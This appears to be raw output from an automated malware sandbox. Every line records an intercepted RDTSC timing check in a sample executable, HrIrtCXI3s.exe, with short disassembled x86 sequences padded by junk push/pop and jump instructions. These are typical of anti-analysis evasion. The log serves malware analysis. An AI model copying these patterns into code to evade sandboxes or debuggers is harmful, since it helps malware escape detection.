Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DC5B34 second address: DC5B4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBBCD95553h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DC67B6 second address: DC67C0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBBCAD7286h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DC6DE2 second address: DC6DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DC6DE7 second address: DC6E16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FFBBCAD72A8h 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFBBCAD7290h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DC6E16 second address: DC6E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DC70F4 second address: DC7102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FFBBCAD728Eh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DC7102 second address: DC7129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FFBBCD9554Ah 0x0000000a jmp 00007FFBBCD95551h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DCFF03 second address: DCFF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DCF1BA second address: DCF1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FFBBCD95546h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DCF1C8 second address: DCF1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FFBBCAD7286h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DCF1D5 second address: DCF1D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DCF309 second address: DCF314 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FFBBCAD7286h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DCF314 second address: DCF31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DCF42F second address: DCF436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DCF704 second address: DCF738 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FFBBCD95558h 0x0000000e jne 00007FFBBCD95546h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007FFBBCD95546h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DCFB8C second address: DCFB92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DCFB92 second address: DCFB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DCFB9D second address: DCFBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DD5F9D second address: DD5FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DD5FA3 second address: DD5FA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DD60D6 second address: DD60EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FFBBCD9554Dh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DD60EE second address: DD60F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DD63DC second address: DD63FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FFBBCD95546h 0x00000009 jmp 00007FFBBCD9554Dh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jl 00007FFBBCD9554Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DD6577 second address: DD657B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DD657B second address: DD6581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DD66C6 second address: DD66CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DD6D9F second address: DD6DAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DD6DAA second address: DD6DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FFBBCAD728Ah 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DDBCD0 second address: DDBCD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DDDE8B second address: DDDE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DDDE93 second address: DDDE97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DDDE97 second address: DDDEB8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFBBCAD7286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FFBBCAD728Ah 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D1D9DC second address: D1D9E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D1D9E6 second address: D1D9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBBCAD728Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DE1B4B second address: DE1B59 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFBBCD95548h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DE1B59 second address: DE1B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DE1B5F second address: DE1B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DE1B63 second address: DE1B83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DE1B83 second address: DE1B9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95555h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DE1D0E second address: DE1D28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBBCAD7294h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DE1D28 second address: DE1D32 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBBCD95546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DE1D32 second address: DE1D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jns 00007FFBBCAD7286h 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 ja 00007FFBBCAD7286h 0x00000018 jns 00007FFBBCAD7286h 0x0000001e jnl 00007FFBBCAD7286h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DE1D58 second address: DE1D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DEDF26 second address: DEDF4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBBCAD7291h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FFBBCAD7286h 0x00000012 jns 00007FFBBCAD7286h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DEDF4A second address: DEDF7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFBBCD9554Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007FFBBCD95548h 0x00000011 pushad 0x00000012 popad 0x00000013 jg 00007FFBBCD9554Eh 0x00000019 popad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DEDF7A second address: DEDF7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DEDF7E second address: DEDF90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FFBBCD95546h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DEDF90 second address: DEDF94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DF160D second address: DF161A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jo 00007FFBBCD9554Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DF3747 second address: DF3750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DF3750 second address: DF3756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DF326E second address: DF3276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DF3276 second address: DF329E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FFBBCD9554Fh 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jnl 00007FFBBCD95546h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DF329E second address: DF32A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DF32A2 second address: DF32C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95555h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DF32C1 second address: DF32C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E01C4F second address: E01C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBBCD95557h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E01C6A second address: E01C7D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFBBCAD7286h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E01C7D second address: E01C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E01C82 second address: E01CA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7297h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jng 00007FFBBCAD728Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E01CA6 second address: E01CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E01CAE second address: E01CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E01CB2 second address: E01CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E01ACF second address: E01AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E01AD5 second address: E01AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 je 00007FFBBCD95546h 0x0000000f jnp 00007FFBBCD95546h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E01AEC second address: E01AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E01AF1 second address: E01AFB instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFBBCD9554Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E08902 second address: E08926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FFBBCAD728Ah 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 jl 00007FFBBCAD7286h 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c je 00007FFBBCAD7286h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E08926 second address: E0892A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E08E71 second address: E08E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E08E75 second address: E08EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBBCD95552h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FFBBCD95557h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E0910B second address: E0910F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E0910F second address: E09129 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFBBCD95546h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FFBBCD9554Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E09129 second address: E09132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E09132 second address: E0913B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E09AFA second address: E09B45 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FFBBCAD7292h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FFBBCAD728Ch 0x00000011 jno 00007FFBBCAD7286h 0x00000017 pushad 0x00000018 push esi 0x00000019 jmp 00007FFBBCAD7293h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 pop esi 0x00000021 pushad 0x00000022 push eax 0x00000023 pop eax 0x00000024 jns 00007FFBBCAD7286h 0x0000002a popad 0x0000002b pushad 0x0000002c push edx 0x0000002d pop edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E0D1EF second address: E0D1F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FFBBCD95546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E10148 second address: E10167 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7299h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E10167 second address: E1016D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E1016D second address: E10171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E10171 second address: E10177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E0FD92 second address: E0FD96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E0FD96 second address: E0FDB4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FFBBCD9554Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E0FDB4 second address: E0FDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FFBBCAD7296h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E0FDD3 second address: E0FDD9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E0FDD9 second address: E0FDE4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D20EC3 second address: D20EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D20EC9 second address: D20ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F2DFBD second address: F2DFE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007FFBBCD9555Ch 0x0000000d jmp 00007FFBBCD95554h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F2DFE0 second address: F2DFEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007FFBBCAD7286h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F2DFEE second address: F2DFF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
